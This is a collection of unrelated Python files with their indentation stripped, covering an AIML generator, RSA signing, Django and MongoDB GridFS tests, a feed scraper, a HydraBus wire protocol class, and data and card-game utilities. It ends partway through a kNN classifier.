return think
def setUserName(name='username'):
think = Element('think')
setname = Element('set')
setname.set('name', 'username')
setname.text = name
think.append(setname)
return think
def listOfTemplates(templates):
random = Element('random')
print("TS>>>>", templates)
for t in templates:
print("TEMPLATE>>>>", t)
child = SubElement(random, 'li')
child.text = t
return random
def createTopic(topicname, categories):
topic = Element('topic')
topic.set('name', topicname)
for cat in categories:
topic.append(cat)
return topic
def srai(theTopic):
srai = Element('srai')
srai.text = theTopic.upper()
return srai
def makeitThat(string):
if (string[-1] == '?'):
string = string[:-1]
p = re.compile('[a-z]| ', re.IGNORECASE)
that = ''
cut = 0
for l in string[::-1]:
if p.match(l) == None:
cut += 1
break
else:
that += l
if cut == 0:
that = string.upper()
else:
that = ' _ ' + that[::-1].upper()
return that
def createCategory(patterns, templates, that='', top=''):
category = Element('category')
for p in patterns:
pttrn = SubElement(category, 'pattern')
pttrn.text = p
if len(that)!= 0:
tht = SubElement(category, 'that')
tht.text = that
tmpl = Element('template')
if len(templates) >1:
tmpl.append(listOfTemplates(templates))
else:
tmpl.text = templates[0]
if len(top) != 0:
if (top[:7] == 'GODDAMN'):
tmpl.append(changeTopic(top[7:]))
tmpl.append(srai(top))
else:
tmpl.append(changeTopic(top))
category.append(tmpl)
return category
def learnCategory(pattern, templates, setusername=False):
category = Element('category')
pttrn = SubElement(category, 'pattern')
pttrn.text = pattern
tmpl = Element('template')
if setusername == True:
tmpl.append(setUserName())
for f in templates:
tmpl.append(f)
category.append(tmpl)
return category
def generatefile(theTopic):
# --- main category ---
q1 = 'What kind of %s do you like?' % (theTopic)
q2 = 'Tell me something about %s ' % (theTopic)
q3 = 'What is the best thing about %s ?' % (theTopic)
#q4 = 'I love this topic, how long have you been interested in %s ?' % (theTopic)
questions = [q1, q2, q3]
c0 = createCategory(['GODDAMN'+theTopic.upper()], questions)
# --- subcategories ---
r1 = 'Aww! cute :3 what kind of %s do you think I like?' % (theTopic)
r2 = 'Cool. That is interesting. Do you have any %s ?' % (theTopic)
r3 = 'Well, maybe you are right. I wish I could be a %s :( What would you do first if you turned into a %s ?' % (theTopic, theTopic)
#r4 = 'Not bad. Are you also interested in ANOTHERTOPIC ?' # ????????????
c1 = createCategory(['*'], [r1], makeitThat(q1), 'kindof')
c2 = createCategory(['*'], [r2], makeitThat(q2), 'userhas')
c3 = createCategory(['*'], [r3], makeitThat(q3), 'ifyouwere')
# kostylee :3
c11 = createCategory(['*'], [r1], '_ ' + makeitThat(q1), 'kindof')
c21 = createCategory(['*'], [r2], '_ ' + makeitThat(q2), 'userhas')
c31 = createCategory(['*'], [r3], '_ ' + makeitThat(q3), 'ifyouwere')
#c4 = createCategory([' * BEEN * '], r4, q4.upper()) # !!
mainTopic = createTopic(theTopic.upper(), [c0, c1, c2, c3, c11, c21, c31])
# --- subtopics ---
subtopicsCats = []
kindofCategory = createCategory(['*'], ['You are right. How did you know that?'], makeitThat(r1), 'GODDAMN'+theTopic)
kindof = createTopic('KINDOF', [kindofCategory])
# this sucks. @TODO: stick them all together!
userhasPatterns11 = ['YES', 'I DO', 'YEAH', 'YEP', ' * YES * ', ' * I DO * ', ' * YEAH *', ' * YEP * ', ' * YES', ' * I DO', ' * YEAH', ' * YEP', 'YES * ', 'I DO * ', 'YEAH *', 'YEP * '] # sorry mom
userhasPatterns1 = [' * YES * ']
for c in userhasPatterns11:
subtopicsCats.append(createCategory([c], ['How lucky you are! I wish I had that too.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhasPatterns22 = ['NO', 'NOPE', ' * NO * ', ' * NOPE * ', 'NO * ', 'NOPE * ', ' * NO', ' * NOPE'] # eboochiye kostylee! i will change this shit..someday
userhasPatterns2 = [' * NO * ']
for c in userhasPatterns22:
subtopicsCats.append(createCategory([c], ['Oh poor, I do.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhasPatterns33 = ['MAYBE', 'MIGHT', ' * MAYBE * ', ' * MIGHT * ', 'MAYBE * ', 'MIGHT * ', ' * MAYBE', ' * MIGHT']
userhasPatterns3 = [' * MAYBE * ']
for c in userhasPatterns33:
subtopicsCats.append(createCategory([c], ['Well that is OK! Tell me more about things like this.'], makeitThat(r2), 'GODDAMN'+theTopic))
userhas = createTopic('USERHAS', subtopicsCats)
ifyouwereCatefory = createCategory(['*'], ['...blah blah ... :)'], makeitThat(r3), 'GODDAMN'+theTopic)
ifyouwere = createTopic('IFYOUWERE', [ifyouwereCatefory])
aimlfile = createAIML([mainTopic, kindof, userhas, ifyouwere])
writetofile(prettify(aimlfile), theTopic)
#print(">>>>", prettify(aimlfile))
|
from __future__ import annotations
from typing import Optional
from asn1crypto import keys, pem
from ... import hashes
from ...padding import pss
from ...padding.v15 import enc_digestinfo, pad_pkcs1_v15
from ...public import key, rsa
from ..hashlib import HashlibHash
class PartialRsaPublicKey(rsa.RsaPublicKey):
def export_public_der(self) -> bytes:
return keys.PublicKeyInfo.wrap(
keys.RSAPublicKey({"modulus": self.modulus, "public_exponent": self.public_exponent}), "rsa"
).dump()
def export_public_pem(self) -> str:
return pem.armor("PUBLIC KEY", self.export_public_der()).decode()
def export_public_openssh(self) -> str:
raise NotImplementedError()
class PartialRsaPrivateKey(rsa.RsaPrivateKey):
def export_private_der(self) -> bytes:
raise NotImplementedError()
def export_private_pem(self) -> str:
raise NotImplementedError()
def export_private_openssh(self) -> str:
raise NotImplementedError()
async def sign_int(self, msg: int, meta: Optional[rsa.RsaSignatureMetadata] = None) -> rsa.RsaSignature:
if self.__class__.sign_bytes is PartialRsaPrivateKey.sign_bytes:
raise NotImplementedError
return await self.sign_bytes(rsa.i2osp(msg, self.public.modlen), meta)
async def sign_bytes(self, msg: bytes, meta: Optional[rsa.RsaSignatureMetadata] = None) -> rsa.RsaSignature:
if self.__class__.sign_int is PartialRsaPrivateKey.sign_int:
raise NotImplementedError
return await self.sign_int(rsa.os2ip(msg), meta)
async def sign_v15_raw(
self, msg: bytes, meta: Optional[rsa.RsaSignatureMetadata] = None
) -> rsa.RsaSignature:
return await self.sign_bytes(
pad_pkcs1_v15(msg, self.public.modlen),
meta or rsa.RsaSignatureMetadata(rsa.AsymmetricAlgorithm.RSA, rsa.RsaScheme.PKCS1v1_5_RAW),
)
async def sign_v15_digest(self, dgst: hashes.MessageDigest) -> rsa.RsaSignature:
return await self.sign_v15_raw(
enc_digestinfo(dgst),
rsa.RsaV15Metadata(key.AsymmetricAlgorithm.RSA, rsa.RsaScheme.PKCS1v1_5, dgst.algorithm),
)
async def sign_v15(self, msg: bytes, hash_alg: Optional[hashes.HashAlgorithm] = None) -> rsa.RsaSignature:
dgst = HashlibHash.hash(hash_alg or self.default_hash_algorithm, msg)
return await self.sign_v15_digest(dgst)
async def sign_pss_digest(
self, dgst: hashes.MessageDigest, options: Optional[rsa.PssOptions] = None
) -> rsa.RsaSignature:
opt = options or self.default_pss_options
padded, meta = pss.pad_pss(self.public, self.default_hash_algorithm, dgst, opt)
return await self.sign_bytes(padded, meta)
async def sign_pss(self, msg: bytes, options: Optional[rsa.PssOptions] = None) -> rsa.RsaSignature:
# 9.1.1/2)
opt = options or self.default_pss_options
hash_alg = opt and opt.hash_alg or self.default_hash_algorithm
dgst = HashlibHash.hash(hash_alg, msg)
return await self.sign_pss_digest(dgst, opt)
async def sign_digest(self, digest: hashes.MessageDigest) -> rsa.RsaSignature:
if self.default_scheme == rsa.RsaScheme.PSS:
return await self.sign_pss_digest(digest)
if self.default_scheme == rsa.RsaScheme.PKCS1v1_5:
return await self.sign_v15_digest(digest)
raise Exception(f"Bad default scheme: {self.default_scheme}")
async def sign(self, msg: bytes) -> rsa.RsaSignature:
if self.default_scheme == rsa.RsaScheme.PSS:
return await self.sign_pss(msg)
if self.default_scheme == rsa.RsaScheme.PKCS1v1_5:
return await self.sign_v15(msg)
raise Exception(f"Bad default scheme: {self.default_scheme}")
|
from django.core.exceptions import PermissionDenied
from functools import wraps
def ajax_login_required(view):
@wraps(view)
def wrapper(request, *args, **kwargs):
if not request.user.is_authenticated():
raise PermissionDenied
return view(request, *args, **kwargs)
return wrapper
|
from distutils.core import setup
setup(
name="repless",
version='0.1.0',
author="VulcanoAhab",
packages=["repless/aws_peices", "repless/fab_shorts"],
url="https://github.com/VulcanoAhab/repless.git",
description="Severless Utils",
install_requires=[
]
)
|
import sys
val1 = sys.argv[0]
val2 = len(sys.argv)
val3 = str(sys.argv)
print("nombre script: {}".format(val1))
print("cantidad de val3: {}".format(val2))
print("lista de val3: {}" .format(val3))
|
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Periodic Discovery Job
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
from __future__ import absolute_import
import random
# NOC modules
from noc.services.discovery.jobs.base import MODiscoveryJob
from noc.core.span import Span
from noc.core.datastream.change import bulk_datastream_changes
from ..box.resolver import ResolverCheck
from .uptime import UptimeCheck
from .interfacestatus import InterfaceStatusCheck
from .mac import MACCheck
from .metrics import MetricsCheck
from .cpestatus import CPEStatusCheck
class PeriodicDiscoveryJob(MODiscoveryJob):
name = "periodic"
umbrella_cls = "Discovery | Job | Periodic"
# Store context
context_version = 1
is_periodic = True
default_contexts = ("counters", "metric_windows", "active_thresholds")
def handler(self, **kwargs):
with Span(sample=self.object.periodic_telemetry_sample), bulk_datastream_changes():
if self.object.auth_profile and self.object.auth_profile.type == "S":
self.logger.info("Invalid credentials. Stopping")
return
ResolverCheck(self).run()
if self.allow_sessions():
self.logger.debug("Using CLI sessions")
with self.object.open_session():
self.run_checks()
else:
self.run_checks()
def run_checks(self):
if self.object.object_profile.enable_periodic_discovery_uptime:
UptimeCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_interface_status:
InterfaceStatusCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_cpestatus:
CPEStatusCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_mac:
MACCheck(self).run()
if self.object.object_profile.enable_periodic_discovery_metrics:
MetricsCheck(self).run()
def get_running_policy(self):
return self.object.get_effective_periodic_discovery_running_policy()
def can_run(self):
return (
super(PeriodicDiscoveryJob, self).can_run()
and self.object.object_profile.enable_periodic_discovery
and self.object.object_profile.periodic_discovery_interval
)
def get_interval(self):
if self.object:
return self.object.object_profile.periodic_discovery_interval
else:
# Dereference error
return random.randint(60, 120)
def get_failed_interval(self):
return self.object.object_profile.periodic_discovery_interval
def can_update_alarms(self):
return self.object.can_create_periodic_alarms()
def get_fatal_alarm_weight(self):
return self.object.object_profile.periodic_discovery_fatal_alarm_weight
def get_alarm_weight(self):
return self.object.object_profile.periodic_discovery_alarm_weight
|
# Copyright 2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test GridFSBucket class."""
import copy
import datetime
import os
import re
import sys
from json import loads
sys.path[0:0] = [""]
from bson import Binary
from bson.int64 import Int64
from bson.json_util import object_hook
import gridfs
from gridfs.errors import NoFile, CorruptGridFile
from test import (unittest,
IntegrationTest)
# Commands.
_COMMANDS = {"delete": lambda coll, doc: [coll.delete_many(d["q"])
for d in doc['deletes']],
"insert": lambda coll, doc: coll.insert_many(doc['documents']),
"update": lambda coll, doc: [coll.update_many(u["q"], u["u"])
for u in doc['updates']]
}
# Location of JSON test specifications.
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'gridfs')
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case. Special case for _id.
if camel == "id":
return "file_id"
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
class TestAllScenarios(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestAllScenarios, cls).setUpClass()
cls.fs = gridfs.GridFSBucket(cls.db)
cls.str_to_cmd = {
"upload": cls.fs.upload_from_stream,
"download": cls.fs.open_download_stream,
"delete": cls.fs.delete,
"download_by_name": cls.fs.open_download_stream_by_name}
def init_db(self, data, test):
self.cleanup_colls(self.db.fs.files, self.db.fs.chunks,
self.db.expected.files, self.db.expected.chunks)
# Read in data.
if data['files']:
self.db.fs.files.insert_many(data['files'])
self.db.expected.files.insert_many(data['files'])
if data['chunks']:
self.db.fs.chunks.insert_many(data['chunks'])
self.db.expected.chunks.insert_many(data['chunks'])
# Make initial modifications.
if "arrange" in test:
for cmd in test['arrange'].get('data', []):
for key in cmd.keys():
if key in _COMMANDS:
coll = self.db.get_collection(cmd[key])
_COMMANDS[key](coll, cmd)
def init_expected_db(self, test, result):
# Modify outcome DB.
for cmd in test['assert'].get('data', []):
for key in cmd.keys():
if key in _COMMANDS:
# Replace wildcards in inserts.
for doc in cmd.get('documents', []):
keylist = doc.keys()
for dockey in copy.deepcopy(list(keylist)):
if "result" in str(doc[dockey]):
doc[dockey] = result
if "actual" in str(doc[dockey]): # Avoid duplicate
doc.pop(dockey)
# Move contentType to metadata.
if dockey == "contentType":
doc["metadata"] = {dockey: doc.pop(dockey)}
coll = self.db.get_collection(cmd[key])
_COMMANDS[key](coll, cmd)
if test['assert'].get('result') == "&result":
test['assert']['result'] = result
def sorted_list(self, coll, ignore_id):
to_sort = []
for doc in coll.find():
docstr = "{"
if ignore_id: # Cannot compare _id in chunks collection.
doc.pop("_id")
for k in sorted(doc.keys()):
if k == "uploadDate": # Can't compare datetime.
self.assertTrue(isinstance(doc[k], datetime.datetime))
else:
docstr += "%s:%s " % (k, repr(doc[k]))
to_sort.append(docstr + "}")
return to_sort
def create_test(scenario_def):
def run_scenario(self):
# Run tests.
self.assertTrue(scenario_def['tests'], "tests cannot be empty")
for test in scenario_def['tests']:
self.init_db(scenario_def['data'], test)
# Run GridFs Operation.
operation = self.str_to_cmd[test['act']['operation']]
args = test['act']['arguments']
extra_opts = args.pop("options", {})
if "contentType" in extra_opts:
extra_opts["metadata"] = {
"contentType": extra_opts.pop("contentType")}
args.update(extra_opts)
converted_args = dict((camel_to_snake(c), v)
for c, v in args.items())
expect_error = test['assert'].get("error", False)
result = None
error = None
try:
result = operation(**converted_args)
if 'download' in test['act']['operation']:
result = Binary(result.read())
except Exception as exc:
if not expect_error:
raise
error = exc
self.init_expected_db(test, result)
# Asserts.
errors = {"FileNotFound": NoFile,
"ChunkIsMissing": CorruptGridFile,
"ExtraChunk": CorruptGridFile,
"ChunkIsWrongSize": CorruptGridFile,
"RevisionNotFound": NoFile}
if expect_error:
self.assertIsNotNone(error)
self.assertIsInstance(error, errors[test['assert']['error']],
test['description'])
else:
self.assertIsNone(error)
if 'result' in test['assert']:
if test['assert']['result'] == 'void':
test['assert']['result'] = None
self.assertEqual(result, test['assert'].get('result'))
if 'data' in test['assert']:
# Create alphabetized list
self.assertEqual(
set(self.sorted_list(self.db.fs.chunks, True)),
set(self.sorted_list(self.db.expected.chunks, True)))
self.assertEqual(
set(self.sorted_list(self.db.fs.files, False)),
set(self.sorted_list(self.db.expected.files, False)))
return run_scenario
def _object_hook(dct):
if 'length' in dct:
dct['length'] = Int64(dct['length'])
return object_hook(dct)
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = loads(
scenario_stream.read(), object_hook=_object_hook)
# Because object_hook is already defined by bson.json_util,
# and everything is named 'data'
def str2hex(jsn):
for key, val in jsn.items():
if key in ("data", "source", "result"):
if "$hex" in val:
jsn[key] = Binary(bytes.fromhex(val['$hex']))
if isinstance(jsn[key], dict):
str2hex(jsn[key])
if isinstance(jsn[key], list):
for k in jsn[key]:
str2hex(k)
str2hex(scenario_def)
# Construct test from scenario.
new_test = create_test(scenario_def)
test_name = 'test_%s' % (
os.path.splitext(filename)[0])
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import feedgen.feed
import lxml.html
import re
import selenium
import selenium.webdriver.chrome.options
def magic():
url = 'https://24h.pchome.com.tw/books/store/?q=/R/DJAZ/new'
chrome_options = selenium.webdriver.chrome.options.Options()
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--incognito')
chrome_options.binary_location = '/usr/bin/chromium-browser'
b = selenium.webdriver.Chrome(chrome_options=chrome_options)
b.get(url)
html = b.find_element_by_tag_name('html').get_attribute('innerHTML')
b.close()
html = lxml.html.fromstring(html)
title = html.cssselect('title')[0].text_content()
feed = feedgen.feed.FeedGenerator()
feed.author({'name': 'PChome 24h Feed Generator'})
feed.id(url)
feed.link(href=url, rel='alternate')
feed.title(title)
for item in html.cssselect('#ProdListContainer dl'):
try:
a = item.cssselect('.prod_name a')[0]
book_name = a.text_content()
book_url = a.get('href')
if re.match('//', book_url):
book_url = 'https:' + book_url
item_txt = item.text_content()
book_date = re.search('出版日:\s*(\S+)', item_txt, re.M)[0]
book_publisher = re.search('出版社:\s*(\S+)', item_txt, re.M)[0]
k = '%s - %s - %s' % (book_name, book_publisher, book_date)
entry = feed.add_entry()
entry.id(book_url)
entry.title(k)
entry.link(href=book_url)
except IndexError:
pass
print(str(feed.atom_str(), 'utf-8'))
if __name__ == '__main__':
magic()
|
import time
import numba
import numpy as np
@numba.jit(numba.uint8(numba.complex64, numba.complex64))
def cnt(z, c):
k = 0
while k < 100:
z = z * z + c
if z.real**2 + z.imag**2 > 4:
break
k += 1
return k
@numba.jit
def mand(M, N):
init_z = complex(0.0, 0.0)
grid = np.empty((M, N), dtype=np.uint8)
xs = np.linspace(-2, 2, N)
ys = np.linspace(-2, 2, M)
for j, y in enumerate(ys):
for i, x in enumerate(xs):
grid[j, i] = cnt(init_z, complex(x, y))
return grid
def main():
s = time.time()
M = N = 2500
grid = mand(M, N)
e = time.time()
elapsed = f"elapsed time {e-s}"
np.savetxt("result.txt", grid, fmt="%d", delimiter=',')
return elapsed
print(main())
|
# Copyright 2019 Nicolas OBERLI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .protocol import Protocol
from .common import split
class RawWire(Protocol):
"""
Raw wire protocol handler
:example:
>>> import pyHydrabus
>>> r=pyHydrabus.RawWire('/dev/hydrabus')
>>> # Set SDA to high
>>> r.sda = 1
>>> # Send two clock ticks
>>> r.clocks(2)
>>> # Read two bytes
>>> data = r.read(2)
"""
__RAWWIRE_DEFAULT_CONFIG = 0b000
def __init__(self, port=""):
self._config = self.__RAWWIRE_DEFAULT_CONFIG
self._clk = 0
self._sda = 0
super().__init__(name=b"RAW1", fname="Raw-Wire", mode_byte=b"\x05", port=port)
self._configure_port()
def read_bit(self):
"""
Sends a clock tick, and return the read bit value
"""
CMD = 0b00000111
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return self._hydrabus.read(1)
def read_byte(self):
"""
Read a byte from the raw wire
:return: The read byte
:rtype: bytes
"""
CMD = 0b00000110
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return self._hydrabus.read(1)
def clock(self):
"""
Send a clock tick
"""
CMD = 0b00001001
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting pin.")
return False
def bulk_ticks(self, num):
"""
Sends a bulk of clock ticks (1 to 16)
https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-raw-wire-mode-guide#bulk-clock-ticks-0b0010xxxx
:param num: Number of clock ticks to send
:type num: int
"""
if not num > 0:
raise ValueError("Send at least one clock tick")
if not num <= 16:
raise ValueError("Too many ticks to send")
CMD = 0b00100000
CMD = CMD | (num - 1)
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error sending clocks.")
return False
def clocks(self, num):
"""
Sends a number of clock ticks
:param num: Number of clock ticks to send
:type num: int
"""
if not num > 0:
raise ValueError("Must be a positive integer")
while num > 16:
self.bulk_ticks(16)
num = num - 16
self.bulk_ticks(num)
def bulk_write(self, data=b""):
"""
Bulk write on Raw-Wire
https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-raw-wire-mode-guide#bulk-raw-wire-transfer-0b0001xxxx
Parameters:
:param data: Data to be sent
:type data: bytes
"""
CMD = 0b00010000
if not len(data) > 0:
raise ValueError("Send at least one byte")
if not len(data) <= 16:
raise ValueError("Too many bytes to write")
CMD = CMD | (len(data) - 1)
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
self._hydrabus.write(data)
if self._hydrabus.read(1) != b"\x01":
self._logger.warn("Unknown error.")
return self._hydrabus.read(len(data))
def set_speed(self, speed):
"""
Sets the clock max speed.
:param speed: speed in Hz. Possible values : TODO
"""
speeds = {5000: 0b00, 50000: 0b01, 100_000: 0b10, 1_000_000: 0b11}
if speed not in speeds.keys():
raise ValueError(f"Incorrect value. use {speeds.keys()}")
CMD = 0b01100000
CMD = CMD | speeds[speed]
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting speed.")
return False
def _configure_port(self):
CMD = 0b10000000
CMD = CMD | self._config
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
return True
else:
self._logger.error("Error setting config.")
return False
def write(self, data=b""):
"""
Write on Raw-Wire bus
:param data: data to be sent
:type data: bytes
:return: Read bytes
:rtype: bytes
"""
result = b""
for chunk in split(data, 16):
result += self.bulk_write(chunk)
return result
def read(self, length=0):
"""
Read on Raw-Wire bus
:param length: Number of bytes to read
:type length: int
:return: Read data
:rtype: bytes
"""
result = b""
for _ in range(length):
result += self.read_byte()
return result
@property
def clk(self):
"""
CLK pin status
"""
return self._clk
@clk.setter
def clk(self, value):
value = value & 1
CMD = 0b00001010
CMD = CMD | value
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
self._clk = value
return True
else:
self._logger.error("Error setting pin.")
return False
@property
def sda(self):
"""
SDA pin status
"""
CMD = 0b00001000
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
return int.from_bytes(self._hydrabus.read(1), byteorder="big")
@sda.setter
def sda(self, value):
value = value & 1
CMD = 0b00001100
CMD = CMD | value
self._hydrabus.write(CMD.to_bytes(1, byteorder="big"))
if self._hydrabus.read(1) == b"\x01":
self._clk = value
return True
else:
self._logger.error("Error setting pin.")
return False
@property
def wires(self):
"""
Raw-Wire mode (2=2-Wire, 3=3-Wire)
"""
if self._config & 0b100 == 0:
return 2
else:
return 3
@wires.setter
def wires(self, value):
if value == 2:
self._config = self._config & ~(1 << 2)
self._configure_port()
return True
elif value == 3:
self._config = self._config | (1 << 2)
self._configure_port()
return True
else:
self._logger.error("Incorrect value. Must be 2 or 3")
@property
def gpio_mode(self):
"""
Raw-Wire GPIO mode (0=Push-Pull, 1=Open Drain)
"""
return (self._config & 0b1000) >> 3
@gpio_mode.setter
def gpio_mode(self, value):
if value == 0:
self._config = self._config & ~(1 << 3)
self._configure_port()
return True
elif value == 1:
self._config = self._config | (1 << 3)
self._configure_port()
return True
else:
self._logger.error("Incorrect value. Must be 0 or 1")
|
import json
from typing import Optional
def read_content() -> dict:
try:
with open(r"storage/PasswordVault.txt", "r") as file:
obj = json.load(file)
return obj
except json.decoder.JSONDecodeError:
with open(r"storage/PasswordVault.txt", "w") as file:
obj = json.dumps({}, indent=4)
file.write(obj)
return read_content()
def write_content(data: dict) -> Optional[bool]:
try:
with open(r"storage/PasswordVault.txt", "w") as file:
obj = json.dumps(data, indent= 4)
file.write(obj)
return True
except FileNotFoundError:
return
def clean_file() -> None:
return open(r"storage/PasswordVault.txt", "w").close()
if __name__ == "__main__":
clean_file()
|
# -*- encoding: utf-8 -*-
"""
Created by Ênio Viana at 22/09/2021 at 23:09:27
Project: py_dss_tools [set, 2021]
"""
class PriceShape:
name = "PriceShape"
name_plural = "PriceShapes"
columns = ['action', 'csvfile', 'dblfile', 'hour', 'interval', 'like', 'mean', 'minterval', 'npts', 'price',
'sinterval', 'sngfile', 'stddev']
def __init__(self):
self.__action = None
self.__csvfile = None
self.__dblfile = None
self.__hour = None
self.__interval = None
self.__mean = None
self.__minterval = None
self.__npts = None
self.__price = None
self.__sinterval = None
self.__sngfile = None
self.__stddev = None
@property
def action(self):
return self.__action
@action.setter
def action(self, value):
self.__action = value
@property
def csvfile(self):
return self.__csvfile
@csvfile.setter
def csvfile(self, value):
self.__csvfile = value
@property
def dblfile(self):
return self.__dblfile
@dblfile.setter
def dblfile(self, value):
self.__dblfile = value
@property
def hour(self):
return self.__hour
@hour.setter
def hour(self, value):
self.__hour = value
@property
def interval(self):
return self.__interval
@interval.setter
def interval(self, value):
self.__interval = value
@property
def mean(self):
return self.__mean
@mean.setter
def mean(self, value):
self.__mean = value
@property
def minterval(self):
return self.__minterval
@minterval.setter
def minterval(self, value):
self.__minterval = value
@property
def npts(self):
return self.__npts
@npts.setter
def npts(self, value):
self.__npts = value
@property
def price(self):
return self.__price
@price.setter
def price(self, value):
self.__price = value
@property
def sinterval(self):
return self.__sinterval
@sinterval.setter
def sinterval(self, value):
self.__sinterval = value
@property
def sngfile(self):
return self.__sngfile
@sngfile.setter
def sngfile(self, value):
self.__sngfile = value
@property
def stddev(self):
return self.__stddev
@stddev.setter
def stddev(self, value):
self.__stddev = value
|
import numpy as np
import pandas as pd
def numerical_summary(series: pd.Series) -> dict:
"""
Args:
series: series to summarize
Returns:
"""
aggregates = [
"mean",
"std",
"var",
"max",
"min",
"median",
"kurt",
"skew",
"sum",
"mad",
]
summary = series.agg(aggregates).to_dict()
quantiles = [0.05, 0.25, 0.5, 0.75, 0.95]
for percentile, value in series.quantile(quantiles).to_dict().items():
summary["quantile_{:d}".format(int(percentile * 100))] = value
summary["iqr"] = summary["quantile_75"] - summary["quantile_25"]
summary["range"] = summary["max"] - summary["min"]
summary["cv"] = summary["std"] / summary["mean"] if summary["mean"] else np.NaN
# TODO: only calculations for histogram, not the plotting
# summary['image'] = plotting.histogram(series)
return summary
|
import unittest
from pylgrum.card import Card, Rank, Suit
from pylgrum.hand import Hand
from pylgrum.errors import OverdealtHandError
class TestHand(unittest.TestCase):
def test_too_many_cards(self):
"""Implicitly tests the add() override in Hand, too."""
h = Hand()
self.assertEqual(h.size(), 0)
h.add(Card(rank=Rank.QUEEN, suit=Suit.HEART)) # 0 : QH
h.add(Card(rank=Rank.JACK, suit=Suit.DIAMOND)) # 1 : JD
h.add(Card(rank=Rank.ACE, suit=Suit.CLUB)) # 2 : AC
h.add(Card(rank=Rank.KING, suit=Suit.SPADE)) # 3 : KS
h.add(Card(rank=Rank.TWO, suit=Suit.HEART)) # 4 : 2H
h.add(Card(rank=Rank.THREE, suit=Suit.DIAMOND)) # 5 : 3D
h.add(Card(rank=Rank.FOUR, suit=Suit.CLUB)) # 6 : 4C
h.add(Card(rank=Rank.FIVE, suit=Suit.SPADE)) # 7 : 5S
h.add(Card(rank=Rank.TEN, suit=Suit.HEART)) # 8 : 10H
h.add(Card(rank=Rank.NINE, suit=Suit.DIAMOND)) # 9 : 9D
h.add(Card(rank=Rank.EIGHT, suit=Suit.CLUB)) # 10: 8C
self.assertEqual(h.size(), 11) ## a full hand
with self.assertRaises(OverdealtHandError):
h.add(Card(rank=Rank.SEVEN, suit=Suit.SPADE))
if __name__ == '__main__':
unittest.main()
|
import argparse
import collections
import csv
import logging
import math
import pathlib
import random
from typing import Dict, List, NamedTuple, Optional, Sequence, Tuple, TypeVar
import requests
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
Vector = List[float]
def subtract(v: Vector, w: Vector) -> Vector:
if len(v) != len(w):
raise ValueError("Cannot subtract vectors of unequal length.")
return [
v_i - w_i
for v_i, w_i
in zip(v, w)
]
def dot(v: Vector, w: Vector) -> float:
"""Computes v_1 * w_1 + ... + v_n * w_n"""
assert len(v) == len(w), "Vectors must be the same length"
return sum(v_i * w_i for v_i, w_i in zip(v, w))
def magnitude(v: Vector) -> float:
return math.sqrt(dot(v, v))
def distance(v: Vector, w: Vector) -> float:
"""Computes the distance between v and w"""
return magnitude(subtract(v, w))
def raw_majority_vote(labels: List[str]) -> str:
votes = collections.Counter(labels)
winner, _ = votes.most_common(1)[0]
return winner
assert raw_majority_vote(["a", "b", "c", "b"]) == "b"
X = TypeVar("X") # Generic type to represent a data point.
def split_data(data: List[X], prob: float) -> Tuple[List[X], List[X]]:
"""Split data into fractions [prob, 1-prob]"""
data = data[:]
random.shuffle(data)
cut = int(len(data) * prob) # Use prob to find a cutoff
return data[:cut], data[cut:] # and split the shuffled list there.
def majority_vote(labels: List[str]) -> str:
"""Assumes that labels are ordered from nearest to farthest."""
vote_counts = collections.Counter(labels)
winner, winner_count = vote_counts.most_common(1)[0]
num_winners = len([
count
for count in vote_counts.values()
if count == winner_count
])
if num_winners == 1:
return winner
else:
return majority_vote(labels[:-1]) # Try again without the farthest
class LabeledPoint(NamedTuple):
point: Vector
label: str
def knn_classify(
k: int,
labeled_points: List[LabeledPoint],
new_point: Vector
